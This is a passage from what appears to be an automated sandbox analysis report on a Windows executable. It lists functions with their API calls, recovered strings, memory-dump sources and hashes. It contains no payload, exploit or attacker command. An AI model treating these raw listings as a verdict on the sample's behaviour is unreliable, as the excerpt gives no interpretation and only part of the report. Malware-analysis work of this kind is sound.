                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148324
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148356
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0014838C
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148395
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                          • Opcode ID: c1542dfaa70030e3df4d96cc1d8a14c96fa0d978b5da77e933c942e9413881a3
                                                                                                                                                                                                                                          • Instruction ID: 81911af70081f579a5b079810445a050bd982a59d13e128422f8ffe0c1794a8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1542dfaa70030e3df4d96cc1d8a14c96fa0d978b5da77e933c942e9413881a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2616A725043059FCB10EF64D840DAEB3E8FF89714F04892EF98987261EB31E945CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00143388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001433CF
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001433F0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LoadString$_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 4099089115-3080491070
                                                                                                                                                                                                                                          • Opcode ID: 1d3a9958d6c77143d62d0f772ce5b1b3778474ff4b5c88528033a78dcc9452b4
                                                                                                                                                                                                                                          • Instruction ID: 08416a4a830a3efe9f91af3cae729125ad8c366d2d01776aeb5c202566f876c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d3a9958d6c77143d62d0f772ce5b1b3778474ff4b5c88528033a78dcc9452b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F519E72900209BADF15EBE0DD42EEEB778AF14740F144066F505721A2EB712F98DB71
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                                          • API String ID: 1256254125-769500911
                                                                                                                                                                                                                                          • Opcode ID: 906221041717d3029406822d686f5fae27f6f9bbcd1ace41cb27aecde1e5892a
                                                                                                                                                                                                                                          • Instruction ID: f50cdb614e0d3860e44bc515d89ddc86d00ee1adbb22f060c8e451f33b0e0286
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906221041717d3029406822d686f5fae27f6f9bbcd1ace41cb27aecde1e5892a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 574126B2B080268BCB205F7DC9D25BE77A5AFA0754F254129E621DB286F731CC81C390
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00145393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001453A0
                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00145416
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00145420
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 001454A7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                          • Opcode ID: 5e044795d6211b4748d94b46d3ed641f19c1f092758a2b68faf5cbb0e2c435f9
                                                                                                                                                                                                                                          • Instruction ID: 6cb02fd5c2ecb2f94ff47b895b60aa87095566129f6fd3658954c737861d70df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e044795d6211b4748d94b46d3ed641f19c1f092758a2b68faf5cbb0e2c435f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87319235A00604DFCB14DF68C984AAA7BB5EF55345F188065E805DF3A3EB71DD86CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateMenu.USER32 ref: 00163C79
                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00163C88
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00163D10
                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 00163D24
                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00163D2E
                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00163D5B
                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00163D63
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                          • Opcode ID: 83fc75322c5b2cc94364a85f691870a63a6aedcfcdc2767815cf820e91839c3e
                                                                                                                                                                                                                                          • Instruction ID: 4b58055617b10946425f2e8c61424cbc26a3435917172c960074468d14c49ade
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fc75322c5b2cc94364a85f691870a63a6aedcfcdc2767815cf820e91839c3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D415879A01209EFDB14DFA4DC84AEA7BB5FF49350F140029F956A7360D770AA20CF94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 00133CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00133CCA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00131F64
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 00131F6F
                                                                                                                                                                                                                                          • GetParent.USER32 ref: 00131F8B
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00131F8E
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00131F97
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00131FAB
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00131FAE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                          • Opcode ID: 7f140e94ea71b533800e0f534b39abc1b89677fb34c3a3068b3e46575f740b75
                                                                                                                                                                                                                                          • Instruction ID: 334abdf8e27d3e341b069b2ee0a9289f56014a2c888d6e3a6d342f7523683af3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f140e94ea71b533800e0f534b39abc1b89677fb34c3a3068b3e46575f740b75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21BE74A00214BBCF05AFA0DC859FEBBB9AF15350F004116F9A1A72A1CB7459499BA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00163A9D
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00163AA0
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00163AC7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00163AEA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00163B62
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00163BAC
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00163BC7
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00163BE2
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00163BF6
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00163C13
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                                                                                          • Opcode ID: f2ba322e5aca1e0945d33c1f8c22db0d143714d89125c929dac4247405a39ee5
                                                                                                                                                                                                                                          • Instruction ID: 010738395c0d775c3299bb99d61549891e82beead3251f44134ca0a8b93f9301
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ba322e5aca1e0945d33c1f8c22db0d143714d89125c929dac4247405a39ee5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E617A75A00208AFDB10DFA8CC81EEE77B8EF09704F10419AFA15E72A1D774AE95DB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0013B151
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B165
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0013B16C
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B17B
                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0013B18D
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1A6
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1B8
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B1FD
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B212
                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0013A1E1,?,00000001), ref: 0013B21D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                                                                                          • Opcode ID: 3319eea39ca7cda764e87eb72e191ac11d74a1ba16f0df4fc3bcf1c15ca5857a
                                                                                                                                                                                                                                          • Instruction ID: b30cdb74126376d07c7248099fcbc67f64b4b984425082a646a8751ce7e25506
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3319eea39ca7cda764e87eb72e191ac11d74a1ba16f0df4fc3bcf1c15ca5857a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C331BF75504204BFDB109F24ED89B7EBBA9FB52321F104105FB16D7690E7B4AE808FA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00102C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102C94
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CA0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CAB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CB6
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CC1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CCC
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CD7
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CE2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CED
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102CFB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: f7140239efb4a657287e567a2f124c61aa96608fe4e972466a07b53e23936a20
                                                                                                                                                                                                                                          • Instruction ID: e1071dbcc8624b60de43085c484debbf1d10b30ed9f9f9a462d4c0ce0364ded5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7140239efb4a657287e567a2f124c61aa96608fe4e972466a07b53e23936a20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D11C376100118AFCB02EF54D986CDD3BA9FF15354F6144A0FA889B2A2DB71EA509B90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00147DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00147FAD
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00147FC1
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00147FEB
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00148005
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148017
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00148060
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001480B0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                                                                                          • Opcode ID: 97d2e77a794373a6a4e05b6312d85c038c8220bf4a78abe7a424fb1c552966b2
                                                                                                                                                                                                                                          • Instruction ID: c2ff8c5e8589c08e5759565e1ee5739c95df0053207be1c9cca196ffe03788b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97d2e77a794373a6a4e05b6312d85c038c8220bf4a78abe7a424fb1c552966b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1481B1715083019BCB24EF14C854AAEB3E8BF84310F544D6EF889D72A1EB75DD49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 000D5C7A
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: GetClientRect.USER32(?,?), ref: 000D5D30
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: GetWindowRect.USER32(?,?), ref: 000D5D71
                                                                                                                                                                                                                                            • Part of subcall function 000D5D0A: ScreenToClient.USER32(?,?), ref: 000D5D99
                                                                                                                                                                                                                                          • GetDC.USER32 ref: 001146F5
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00114708
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00114716
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0011472B
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00114733
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001147C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
